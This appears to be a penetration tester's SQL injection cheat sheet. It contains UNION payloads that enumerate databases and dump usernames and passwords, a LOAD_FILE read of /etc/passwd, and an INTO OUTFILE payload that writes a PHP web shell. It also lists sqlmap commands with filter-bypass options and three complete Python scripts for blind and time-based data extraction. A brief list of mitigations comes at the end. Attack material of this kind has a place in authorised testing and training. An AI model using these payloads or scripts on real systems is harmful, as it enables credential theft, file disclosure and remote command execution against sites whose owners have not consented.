SQL Injection

Snippets of SQL injection stuff

Terminators

;# (MySQL)
;-- - (MySQL)
;- (Postgres)
/* (Postgres)

Basic Injection Examples

Detect number of columns using order by

' order by 1;-- - 	

Detect number of columns using Union injection

' UNION select 1,2,3;-- -

Get database version

' UNION select 1,@@version,3,4;-- -

Get current database name

' UNION select 1,database(),2,3;-- -

Database Enumeration

List all databases

' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA;-- - 	

List all tables in a specific database

' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev';-- -

List all columns in a specific table

' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials';-- - 

Dump data from a table in another database

' UNION select 1, username, password, 4 from dev.credentials;-- - 

Concat data together into 1 column

' UNION select 1, group_concat(username, password), 3, 4 from dev.credentials;-- - 	

File Injection

Read local file

' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4;-- - 	

Write a string to a local file

' UNION select 'file written successfully!' into outfile '/var/www/html/proof.txt';--

Write a web shell into the base web directory

' UNION select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php';-- - 	

Get Privileges

Find current user

' UNION SELECT 1, user(), 3, 4;-- - 	

Find if user has admin privileges

' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root";-- - 	

Find if all user privileges

' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user="root";-- - 	

Find which directories can be accessed through MySQL

' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv";-- - 	

SQLMap

Generic SQLmap POST Request

$ sqlmap 'http://www.example.com/' --data 'uid=1&name=test' 

POST request specifying injection point with asterisks

$ sqlmap 'http://www.example.com/' --data 'uid=1*&name=test' 	

Copy the HTTP request (POST or GET) to req.txt and pass to SQLMAp

$ sqlmap -r req.txt

Specifying other methods

$ sqlmap -u www.target.com --data='id=1' --method <METHOD>

Specifying a Prefix or Suffix to the injection

$ sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -" 

Changing Risk and Level parameters for more aggressive testing

$ sqlmap -u www.example.com/?id=1 -v 3 --level=5 --risk=3

Changes the SQL queries to use different syntaxes to bypass filters

$ sqlmap -u www.example.com/?id=1 -v 3 --tamper=between

Basic database enumeration and dumping

$ sqlmap -u "http://www.example.com/?id=1" --dbs 
$ sqlmap -u "http://www.example.com/?id=1" --tables -D testdb 	
$ sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname

Passing CSRF token value

$ sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"

If you're getting errors in characters while doing blind sql, use --hex

$ sqlmap -u "http://www.example.com/" --dbs --hex

Sample Scripts

Multi-threaded Blind SQL injection

import requests                                                
import threading
import time                                               
                                                               
url = "http://url?q="

MIN = 0                                                        
                                                               
MAX = 1024                                                     
    
CHUNK_SIZE = 100

SUCCESS_STR = "Suggestions"
                                                               
def BlindarySearch(low, high, sql):
    mid = (high + low) // 2                                    
                                                               
    inj = f"a')/**/or/**/{sql}={mid}%23"
    q = url + inj

    print(q)
                                                               
    r = requests.get(q)                                        
                                                               
    if SUCCESS_STR in r.text:
        return mid                                             

    inj = f"a')/**/or/**/{sql}<{mid}%23"                       

    q = url + inj                                              

    r = requests.get(q)                                        

    if SUCCESS_STR in r.text:
        return BlindarySearch(low, mid-1, sql)
    else:                                                      
        return BlindarySearch(mid+1, high, sql)


def getLength(sql):
    ans = ''

    pos = 1

    newans = ''

    print("Finding Length...")
    length_sql = f"length(({sql}))"
    ans_len = BlindarySearch(MIN, MAX, length_sql)
    print(f"Length: {ans_len}")

    return ans_len


def chunker(seq, size):
    return (seq[pos:pos + size] for pos in range(0, len(seq), size))


def blindCompare(sql, ans_len):
    print(f"Extracting result for \"{sql}\"")

    threads = []

    for pos in range(1,ans_len+1):
        t = threading.Thread(target=getChar, args=(pos,sql))
        threads.append(t)

    print(f"Spawning {ans_len} threads")

    for thread_chunk in chunker(threads, CHUNK_SIZE):
        # Start them all
        for thread in thread_chunk:
            thread.start()
    
        # Wait for all to complete
        for thread in thread_chunk:
            thread.join()


def getChar(pos, sql):
    char_sql = f"ascii(substr(({sql}),{pos},1))"
    char = BlindarySearch(32,127,char_sql)
    global answer
    answer[pos-1] = chr(char)
    print(f"Done {pos}")


if __name__=='__main__':
    t0 = time.time()
    
    #sql = "select @@version"
    sql = "select current_user()"

    sql_nowhites = sql.replace(" ", "/**/")

    ans_len = getLength(sql_nowhites)

    answer = [0] * ans_len

    blindCompare(sql_nowhites, ans_len)

    print(''.join(answer))

    print("done!")
    t1 = time.time()
    total = t1-t0
    print(f"Total time took: {total}s")

Single-Threaded Blind SQL injection. You would usually use this for asynchronous interactions, such as websockets

import time 
import socketio
                                       
sio = socketio.Client()
                                       
@sio.event                         
def message(data):                                                            
    print(data)                

@sio.event        
def emailFound(data):
    global reply
    print(data)                
    reply = data                                                              

                                       
sio.connect('http://url/socket.io/')
                                       
                                       
MIN = 0

MAX = 500             
                                                                              
SUCCESS_STR = True                                                            
                                       
reply = False

def Emittor(inj):       
    print(f"querying {inj}")
    sio.emit("checkEmail",{"email":inj,"token":"eUFeekMC4dTqKgppw5HjFPQZ1t7JuuMN"})
    time.sleep(0.5)                                                                                                                                          
                                                                                                                                                             
                                                                                                                                                             
def BlindarySearch(low, high, sql):                                           
    mid = (high + low) // 2                                                                                                                                  
                                                                              
    inj = f"bb@gmail.com' or {sql}={mid};-- - "
                                       
    Emittor(inj)
                                       
    if SUCCESS_STR == reply:
        return mid
                                       
    inj = f"bb@gmail.com' or {sql}<{mid};-- - "
                                                                              
    Emittor(inj)               

    if SUCCESS_STR == reply:
        return BlindarySearch(low, mid-1, sql)
    else:
        return BlindarySearch(mid+1, high, sql)

def getLength(sql):
    ans = ''

    pos = 1

    newans = ''

    print("Finding Length...")
    length_sql = f"length(({sql}))"
    ans_len = BlindarySearch(MIN, MAX, length_sql)
    print(f"Length: {ans_len}")

    return ans_len


def blindCompare(sql, ans_len):
    print(f"Extracting result for \"{sql}\"")

    answer = ""

    for pos in range(ans_len):
        answer += getChar(pos+1,sql)
        print(answer)


def getChar(pos, sql):
    char_sql = f"ascii(substr(({sql}),{pos},1))"
    char = BlindarySearch(32,127,char_sql)
    return chr(char)


if __name__=='__main__':
    t0 = time.time()

    sql = "SELECT group_concat(column_name) as f FROM INFORMATION_SCHEMA.COLUMNS where table_name='Users'"
  

    ans_len = getLength(sql)

    blindCompare(sql, ans_len)

    print("done!")
    t1 = time.time()
    total = t1-t0
    print(f"Total time took: {total}s")

Sleep Injection with Postgres

import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

SLEEP = 5

url = "https://url?userId=1;"

payload = "SELECT version()"

inj = "SELECT CASE WHEN(ASCII(SUBSTR(("+payload+"),^_POS_^,1))=^_ASCII_^) THEN pg_sleep(^_SLEEP_^) END;"

def convert(inj):
    
    inj = inj.replace(" ", "+")
    inj = inj.replace("'", "$$")

    conv_inj = inj + "--+"

    return conv_inj
   
def time_query(url, conv_inj_replaced):
    # get base line time for normal query
    print("Doing base query")
    r1 = requests.get(url, verify=False)
    base_elapsed = r1.elapsed.total_seconds()

    # get delayed time for injected query
    print("Doing delayed query")
    delay_query = url+conv_inj_replaced 

    r2 = requests.get(delay_query, verify=False)

    delay_elapsed = r2.elapsed.total_seconds()

    # checking difference == SLEEP

    delta = delay_elapsed - base_elapsed

    if round(delta) >= SLEEP:
        return True
    else:
        return False

def iterator_query(url, conv_inj):
    answer = ""
    # 100 = length of output
    # ascii chars from 33 to 126
    for pos in range(1,100):
        for char in range(33,127):
            conv_inj_replaced = conv_inj.replace('^_POS_^', str(pos))
            conv_inj_replaced = conv_inj_replaced .replace('^_ASCII_^', str(char))
            conv_inj_replaced = conv_inj_replaced .replace('^_SLEEP_^', str(SLEEP))

            print(conv_inj_replaced)

            if (time_query(url, conv_inj_replaced)):
                print("found!")
                answer += chr(char)
                print(answer)
                break
            

if __name__=='__main__':
    conv_inj = convert(inj)
    
    iterator_query(url, conv_inj)

Mitigation

  • Input Sanitization on Front-end, Back-end

  • Input Validation on Front-end, Back-end

  • Proper MySQL user Privileges

    • Don't grant privileges on all tables

    • Don't run as root

  • WAF to detect and block attacks

  • Parameterized SQL Queries to prevent user input injection

Last updated